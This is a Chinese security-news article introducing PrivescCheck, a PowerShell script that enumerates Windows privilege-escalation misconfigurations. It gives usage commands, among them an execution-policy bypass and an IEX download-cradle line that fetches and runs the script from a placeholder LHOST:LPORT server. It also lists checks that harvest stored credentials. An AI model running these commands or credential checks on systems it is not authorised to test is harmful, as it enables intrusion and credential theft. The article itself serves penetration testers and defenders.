专栏首页FreeBufPrivescCheck:一款针对Windows系统的提权枚举脚本

PrivescCheck:一款针对Windows系统的提权枚举脚本

PrivescCheck

PrivescCheck是一款针对Windows系统的提权枚举脚本,该脚本能够枚举出目标Windows系统中常见的Windows错误安全配置,而这些错误的安全配置将允许攻击者在目标系统中实现信息收集以及权限提升,这些对于攻击者的漏洞利用以及后渗透攻击来说将非常有用。

该工具基于PowerUp这款工具实现,并且添加了更多的检测机制,以降低工具的误报率。

目前,该项目仍处于开发阶段,因为我们还打算向其中添加更多的检测机制,不过该项目现已接近完工。

其实我本人非常喜欢PowerUp,因为它可以快速枚举出目标设备中的常见漏洞,而且无需借助第三方工具实现。但问题就在于,该工具已经多年未更新了,而且该工具有的时候返回的结果并不准确,存在一定的误报。

因此,在PrivescCheck脚本中我们考虑了以下几个方面:

1、不使用类似accesschk.exe之类的第三方工具; 2、不使用类似whoami.exe或netstat.exe之类的Windows内置命令; 3、不使用类似sc.exe或tasklist.exe之类的Windows内置工具; 4、不使用WMI; 5、必须兼容PowerShell v2;

工具下载

广大研究人员可以使用下列命令将项目源码克隆至本地:

git clone https://github.com/itm4n/PrivescCheck.git

工具使用

我们可以直接在一个PowerShell命令行控制台中运行该脚本:

PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope Process -Force     PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck

该工具在显示输出数据的同时,会将它们写入到一个日志文件中:

PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object "C:\Temp\result.txt"

除此之外,我们也可以打开CMD命令行工具来使用该脚本:

C:\Temp\>powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck"

当然了,你也可以从一台远程Web服务器来导入并使用该脚本:

C:\Temp\>powershell "IEX (New-Object Net.WebClient).DownloadString('http://LHOST:LPORT/Invoke-PrivescCheck.ps1'); Invoke-PrivescCheck"

功能介绍

获取当前用户信息

Invoke-UserCheck - 获取当前用户的用户名和SID Invoke-UserGroupsCheck - 枚举当前用户所属的组(默认组和低特权组除外) Invoke-UserPrivilegesCheck - 枚举潜在高权限用户的令牌

获取目标设备服务

Invoke-InstalledServicesCheck - 枚举非默认服务 Invoke-ServicesPermissionsCheck - 枚举当前用户可以通过服务控制管理器修改的服务 Invoke-ServicesPermissionsRegistryCheck - 枚举当前用户可在注册表中修改的服务 Invoke-ServicesImagePermissionsCheck - E枚举具有可修改二进制文件(或参数)的所有服务 Invoke-ServicesUnquotedPathCheck - 枚举具有可利用的未引用路径的服务

DLL劫持

Invoke-DllHijackingCheck - 检查是否有任何系统路径文件夹可修改

程序/进程获取

Invoke-InstalledProgramsCheck - 枚举默认情况下未安装的应用程序 Invoke-ModifiableProgramsCheck - 枚举拥有DLL文件的可修改EXE的应用程序 Invoke-RunningProcessCheck - 枚举正在运行的进程

获取凭据

Invoke-SamBackupFilesCheck - 检查SAM/SYSTEM备份文件的常用位置 Invoke-UnattendFilesCheck -枚举无人使用的文件并提取凭证 Invoke-WinlogonCheck - 检查存储在Winlogon注册表项中的凭据 Invoke-CredentialFilesCheck - 枚举存储在当前用户AppData文件夹中的凭据文件 Invoke-VaultCredCheck - 枚举保存在凭据管理器中的凭据 Invoke-VaultListCheck - 枚举保存在凭据管理器中的web凭据 Invoke-GPPPasswordCheck - 枚举包含非空“cpassword”字段的组策略首选项(GPP)

获取注册表信息

Invoke-UacCheck - 检查是否启用了UAC(用户访问控制) Invoke-LapsCheck - 检查是否启用了LAPS(本地管理密码解决方案) Invoke-PowershellTranscriptionCheck - 检查是否配置/启用了PowerShell转录 Invoke-RegistryAlwaysInstallElevatedCheck - 检查注册表中是否设置了AlwaysInstallElevated项 Invoke-LsaProtectionsCheck - 检查LSASS是否作为受保护进程运行(附加检查)

获取网络信息

Invoke-TcpEndpointsCheck - 枚举本地计算机(IPv4和IPv6)上的异常TCP节点 Invoke-UdpEndpointsCheck - 枚举本地计算机(IPv4和IPv6)上的异常UDP节点

其他杂项

Invoke-WindowsUpdateCheck - 检查目标设备的上次更新时间 Invoke-SystemInfoCheck - 获取目标设备操作系统的名称和完整的版本字符串 Invoke-LocalAdminGroupCheck - 枚举默认本地管理组的成员 Invoke-MachineRoleCheck - 获取目标设备的角色(工作站、服务器、域控制器) Invoke-SystemStartupHistoryCheck - 获取目标设备系统启动事件的列表 Invoke-SystemStartupCheck - 获取目标系统的上次启动时间 Invoke-SystemDrivesCheck - 获取当前映射的本地驱动器和网络共享的列表

* 参考来源:itm4n,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

本文分享自微信公众号 - FreeBuf(freebuf),作者:Alpha_h4ck

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Lockdoor Framework:一套自带大量网络安全资源的渗透测试框架

    该项目目前仍处于v1.0 BETA测试版本开发阶段,因此使用过程中可能会出现bug,广大用户可以直接将问题反馈到项目的GitHub主页。

    FB客服
  • 适用于渗透测试不同阶段的工具收集整理

    该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。如果你想为此列表添加贡献,欢迎你向我发送pull request。

    FB客服
  • KITT-Lite:基于Python实现的轻量级命令行渗透测试工具集

    KITT渗透测试框架是一种基于Python实现的轻量级命令行渗透测试工具集,本质上上来说,它就是一个针对渗透测试人员设计的开源解决方案。在KITT的帮助下,广大...

    FB客服
  • 渗透测试工具实战技巧合集(二)

    注:SEH(“Structured Exception Handling”),即结构化异常处理,是 windows 操作系统提供给程序设计者的强有力的处理程序错...

    HACK学习
  • DCOMrade:一款枚举DCOM应用漏洞的PowerSHell脚本

    今天给大家介绍的是一款名叫DCOMrade的工具(PowerShell脚本),各位研究人员可利用该工具来枚举存在漏洞的DCOM应用程序。

    C4rpeDime
  • 安全从业人员常用工具指引

    简介 一直以来嫌麻烦没注册freebuf,总是以游客的身份在看一些东西,今天特此注册了一下,首先要表扬一下freebuf,安全验证比较给力,其次感谢平台收集并整...

    FB客服
  • Rust 乱炖 | Rust 让恶意软件也变强了

    今天看到 proofpoint 发表了一篇题为Buer Loader 用 Rust 创造了新的变种 (New Variant of Buer Loader Wr...

    张汉东
  • 常见端口及安全测试

    在渗透测试中,端口扫描是一个非常重要的环节,端口扫描的目的是了解服务器上运行的服务信息,针对不同的端口进行不同的安全测试,本文的主要内容是关于常见端口安全隐患以...

    信安之路
  • nmap 详解版-指令使用方法大全【含安装】

    nmap是一款端口扫描神器。目前官方提供了400多个扩展脚本,用于增强基础功能和扩展更多功能,如漏洞检测、口令爆破。

    斑马

扫码关注云+社区

领取腾讯云代金券